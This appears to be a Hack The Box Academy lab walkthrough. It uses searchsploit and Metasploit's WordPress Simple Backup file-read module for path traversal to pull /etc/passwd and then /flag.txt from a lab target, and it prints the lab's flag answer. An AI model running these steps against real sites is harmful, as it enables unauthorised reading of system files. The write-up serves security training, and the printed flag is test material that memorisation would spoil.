Public Exploits

Intro

In this intro to using public exploits, we’re going to “Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the ‘/flag.txt’ file.”

This box can be found here: Hack The Box - Academy - (you will need active access to HTB Academy)

Research

First, we took our spawned target: 94.237.63.201:54310 (note: your target will be different) and opened it in a web browser, which showed us a WordPress site:

Public Exploits Site
We used this info to search possible exploits related to WordPress backup and found the following results:

[htb-ac-1145252@htb-erx4v1fgpb]─[~]
└──╼ $searchsploit wordpress backup
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
WordPress Core 2.2.3 - /wp-admin/edit.php?ba | php/webapps/30979.txt
WordPress Plugin / Joomla! Component XCloner  | php/webapps/35212.txt
WordPress Plugin Backup 2.0.1 - Information D | php/webapps/19524.txt
WordPress Plugin Backup and Restore 1.0.3 - A | php/webapps/50503.txt
Wordpress Plugin Backup Guard 1.5.8 - Remote  | php/webapps/50093.py
WordPress Plugin Backup Migration 1.2.8 - Una | php/webapps/51445.txt
WordPress Plugin BackUpWordPress 0.4.2b - Rem | php/webapps/4593.txt
WordPress Plugin Database Backup < 5.2 - Remo | php/remote/47187.rb
WordPress Plugin Database Backups 1.2.2.6 -  | php/webapps/49984.html
WordPress Plugin DB Backup - Arbitrary File D | php/webapps/35378.txt
WordPress Plugin Duplicator 1.4.6 - Unauthent | php/webapps/50992.txt
WordPress Plugin Recent Backups 0.7 - Arbitra | php/webapps/37752.txt
WordPress Plugin Shopping Cart for WordPress  | php/webapps/38159.txt
WordPress Plugin Simple Backup 2.7.11 - Multi | php/webapps/39883.txt
WordPress Plugin Supsystic Backup 2.3.9 - Loc | php/webapps/49545.txt
WordPress Plugin Total Upkeep 1.14.9 - Databa | multiple/webapps/49252.txt
WordPress Plugin WP BackupPlus - Database and | php/webapps/34124.txt
WordPress Plugin WP-DB Backup 1.6/1.7 - edit | php/webapps/28382.txt
Wordpress Plugin XCloner 4.2.12 - Remote Code | php/webapps/50077.py
WordPress Theme CherryFramework 3.1.4 - Backu | php/webapps/45896.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results

and find this matching exploit:

WordPress Plugin Simple Backup 2.7.11 - Multi | php/webapps/39883.txt

as well as in MetaSploit:

[msf](Jobs:0 Agents:0) >> search exploit wordpress backup

Matching Modules
================

   #  Name                                                   Disclosure Date  Rank       Check  Description
   -  ----                                                   ---------------  ----       -----  -----------
   0  exploit/unix/webapp/joomla_akeeba_unserialize          2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   1  exploit/multi/php/wp_duplicator_code_inject            2018-08-29       manual     Yes    Snap Creek Duplicator WordPress plugin code injection
   2  exploit/multi/http/wp_db_backup_rce                    2019-04-24       excellent  Yes    WP Database Backup RCE
   3  auxiliary/scanner/http/wp_simple_backup_file_read                       normal     No     WordPress Simple Backup File Read Vulnerability
   4  auxiliary/scanner/http/wp_total_upkeep_downloader      2020-12-12       normal     No     WordPress Total Upkeep Unauthenticated Backup Downloader
   5  auxiliary/scanner/http/wp_bulletproofsecurity_backups  2021-09-17       normal     No     Wordpress BulletProof Security Backup Disclosure
   6  exploit/multi/http/wp_plugin_backup_guard_rce          2021-05-04       excellent  Yes    Wordpress Plugin Backup Guard - Authenticated Remote Code Execution


Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/wp_plugin_backup_guard_rce

Exploit Attempt #1

We select #3 as our exploit, check and set its options and then run the exploit - which finds a pwd file and saves it to our host:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> show options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> set RHOSTS 94.237.63.201
RHOSTS => 94.237.63.201
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> set RPORT 54310
RPORT => 54310
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> check
[-] This module does not support check.
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exploit

[+] File saved in: /home/htb-ac-1145252/.msf4/loot/20240625164127_default_94.237.63.201_simplebackup.tra_077024.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exit

Exiting MSF, we check our file and its the /etc/passwd file, which doesn't really contain anything useful:

┌─[htb-ac-1145252@htb-erx4v1fgpb]─[~/.msf4/loot]
└──╼ $cat 20240625164127_default_94.237.63.201_simplebackup.tra_077024.txt 
root:x:0:0:root:/root:/bin/properties
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:105:107::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

What Went Wrong?

So what went wrong? Well, if we go back to the options for the exploit in the Metasploit console, we didn’t change our path. The prompt for the box clearly states the flag located at /flag.txt. So, we’ll go back, change the FILEPATH and now our options should look like this:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> show options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     94.237.63.201    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      54310            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

Exploit Attempt #2

We run our exploit again and get a new file:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exploit

[+] File saved in: /home/htb-ac-1145252/.msf4/loot/20240625170124_default_94.237.63.201_simplebackup.tra_307330.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Success - Flag Found

Check our file once more and we have our flag:

[htb-ac-1145252@htb-erx4v1fgpb]─[~/.msf4/loot]
└──╼ $cat /home/htb-ac-1145252/.msf4/loot/20240625170124_default_94.237.63.201_simplebackup.tra_307330.txt
HTB{my_f1r57_h4ck}

Screenshot: Public Exploits Answer